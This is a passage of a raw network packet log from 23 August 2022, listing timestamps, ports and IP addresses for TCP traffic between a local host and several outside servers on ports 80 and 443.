Aug 23, 2022 03:43:35.178209066 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:43:35.178236961 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:43:35.178267956 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:43:35.178294897 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:43:35.178323984 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:43:35.298594952 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:43:35.298810959 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:43:35.373613119 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:35.373661995 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:35.412111044 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:35.412163973 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:35.412193060 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:35.412220955 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:35.412293911 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:35.412348032 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:35.449947119 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:35.449980021 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:35.449997902 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:35.450012922 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:35.450031996 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:35.450150967 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:35.535497904 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:35.537606955 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:39.596601963 CEST	49861	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:39.596657038 CEST	443	49861	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:39.596781969 CEST	49861	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:39.596992016 CEST	49861	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:39.597013950 CEST	443	49861	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:39.658370972 CEST	443	49861	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:39.711314917 CEST	49861	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:40.104418039 CEST	49861	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:40.104476929 CEST	443	49861	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:40.106654882 CEST	443	49861	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:40.106677055 CEST	443	49861	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:40.106795073 CEST	49861	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:40.110802889 CEST	49861	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:40.110992908 CEST	49861	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:40.111012936 CEST	443	49861	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:40.111071110 CEST	443	49861	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:40.171886921 CEST	443	49861	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:40.172013044 CEST	443	49861	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:40.172318935 CEST	49861	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:40.188538074 CEST	49861	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:40.188587904 CEST	443	49861	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:42.305778980 CEST	49753	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:42.306363106 CEST	443	49753	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:42.306426048 CEST	443	49753	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:42.306515932 CEST	49753	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:42.306871891 CEST	49753	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:49.822319031 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:43:54.367391109 CEST	49875	443	192.168.2.3	104.22.1.232
Aug 23, 2022 03:43:54.367468119 CEST	443	49875	104.22.1.232	192.168.2.3
Aug 23, 2022 03:43:54.370619059 CEST	49875	443	192.168.2.3	104.22.1.232
Aug 23, 2022 03:43:54.458322048 CEST	49875	443	192.168.2.3	104.22.1.232
Aug 23, 2022 03:43:54.458363056 CEST	443	49875	104.22.1.232	192.168.2.3
Aug 23, 2022 03:43:54.511203051 CEST	443	49875	104.22.1.232	192.168.2.3
Aug 23, 2022 03:43:54.511382103 CEST	49875	443	192.168.2.3	104.22.1.232
Aug 23, 2022 03:43:54.517548084 CEST	49875	443	192.168.2.3	104.22.1.232
Aug 23, 2022 03:43:54.517571926 CEST	443	49875	104.22.1.232	192.168.2.3
Aug 23, 2022 03:43:54.518295050 CEST	443	49875	104.22.1.232	192.168.2.3
Aug 23, 2022 03:43:54.570327997 CEST	49875	443	192.168.2.3	104.22.1.232
Aug 23, 2022 03:43:59.032641888 CEST	49875	443	192.168.2.3	104.22.1.232
Aug 23, 2022 03:43:59.075392962 CEST	443	49875	104.22.1.232	192.168.2.3
Aug 23, 2022 03:43:59.097214937 CEST	443	49875	104.22.1.232	192.168.2.3
Aug 23, 2022 03:43:59.097348928 CEST	443	49875	104.22.1.232	192.168.2.3
Aug 23, 2022 03:43:59.097553015 CEST	49875	443	192.168.2.3	104.22.1.232
Aug 23, 2022 03:43:59.103226900 CEST	49875	443	192.168.2.3	104.22.1.232
Aug 23, 2022 03:43:59.170766115 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.170821905 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.170954943 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.171461105 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.171489000 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.220885038 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.221031904 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.224014044 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.224035978 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.224348068 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.226905107 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.266896963 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.267056942 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.267138004 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.267136097 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.267170906 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.267221928 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.267237902 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.267394066 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.267430067 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.267457008 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.267471075 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.267513037 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.267518997 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.267534018 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.267575026 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.267586946 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.267661095 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.267694950 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.267704010 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.267750025 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.267786026 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.267795086 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.267848015 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.267904997 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.267930984 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.267952919 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.267996073 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.268007040 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.268100977 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.268143892 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.268155098 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.268204927 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.268239021 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.268239975 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.268248081 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.268311024 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.268312931 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.268323898 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.268368006 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.268378019 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.268431902 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.268470049 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.268479109 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.268537998 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.268579006 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.268600941 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.268610001 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.268649101 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.268655062 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.268662930 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.268706083 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.268732071 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.268814087 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.268857002 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.268857002 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.268872023 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.268954992 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.268965006 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.269026995 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.269068956 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.269079924 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.269093990 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.269118071 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.285501957 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.285576105 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.285870075 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.285960913 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.286091089 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.286145926 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.286215067 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.286258936 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.286269903 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.286334038 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.286339045 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.286351919 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.286382914 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.286397934 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.286518097 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.286565065 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.286603928 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.286655903 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.286766052 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.286811113 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.286824942 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.286894083 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.287039995 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.287106037 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.287235022 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.287379980 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.302406073 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.302489042 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.302489996 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.302517891 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.302536011 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.302555084 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.302572012 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.302634001 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.302669048 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.302681923 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.302706003 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.302757978 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.303530931 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.303615093 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.303642035 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.303715944 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.303718090 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.303735971 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.303766966 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.303977966 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.304039955 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.304059982 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.304081917 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.304107904 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.304116964 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.304126978 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.304251909 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.304299116 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.304313898 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.304351091 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.304593086 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.304660082 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.304742098 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.304799080 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.304994106 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.305073023 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.305181980 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.305242062 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.305392027 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.305440903 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.305517912 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.305593014 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.305706024 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.305896997 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.306349993 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.306428909 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.306466103 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.306529999 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.306570053 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.306629896 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.306691885 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.306772947 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.306788921 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.306849003 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.306888103 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.306946993 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.306987047 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.307049036 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.307092905 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.307152033 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.307179928 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.307236910 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.307429075 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.307492971 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.308113098 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.308134079 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.308204889 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.308218956 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.308269978 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.308281898 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.308294058 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.308325052 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.309182882 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.309289932 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.309313059 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.310236931 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.310327053 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.310349941 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.310486078 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.310585022 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.310590029 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.310616970 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.310647964 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.310662985 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.310678005 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.310684919 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.310714006 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.310724974 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.310743093 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.310748100 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.310802937 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.310826063 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.319967031 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.320189953 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.320518970 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.320605993 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.320620060 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.320643902 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.320667028 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.320703030 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.320707083 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.321113110 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.321154118 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.321321964 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.321340084 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.321398020 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.322087049 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.322194099 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.322259903 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.322263002 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.322284937 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.322315931 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.322330952 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.322503090 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.322802067 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.322860003 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.322879076 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.322897911 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.322923899 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.322931051 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.323224068 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.323575974 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.323618889 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.323651075 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.323668957 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.323687077 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.323710918 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.323762894 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.324089050 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.324642897 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.324688911 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.324723005 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.324743032 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.324778080 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.324783087 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.325455904 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.325557947 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.325579882 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.325601101 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.325622082 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.325638056 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.326179981 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.326220036 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.326263905 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.326284885 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.326303959 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.326332092 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.326787949 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.326836109 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.326889992 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.326913118 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.326926947 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.326957941 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.327634096 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.327678919 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.327723026 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.327744961 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.327766895 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.327779055 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.328510046 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.328552008 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.328708887 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.328732014 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.328838110 CEST	49884	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:43:59.329415083 CEST	443	49884	162.159.133.233	192.168.2.3
Aug 23, 2022 03:43:59.329533100 CEST	443	49884	162.159.133.233	192.168.2.3
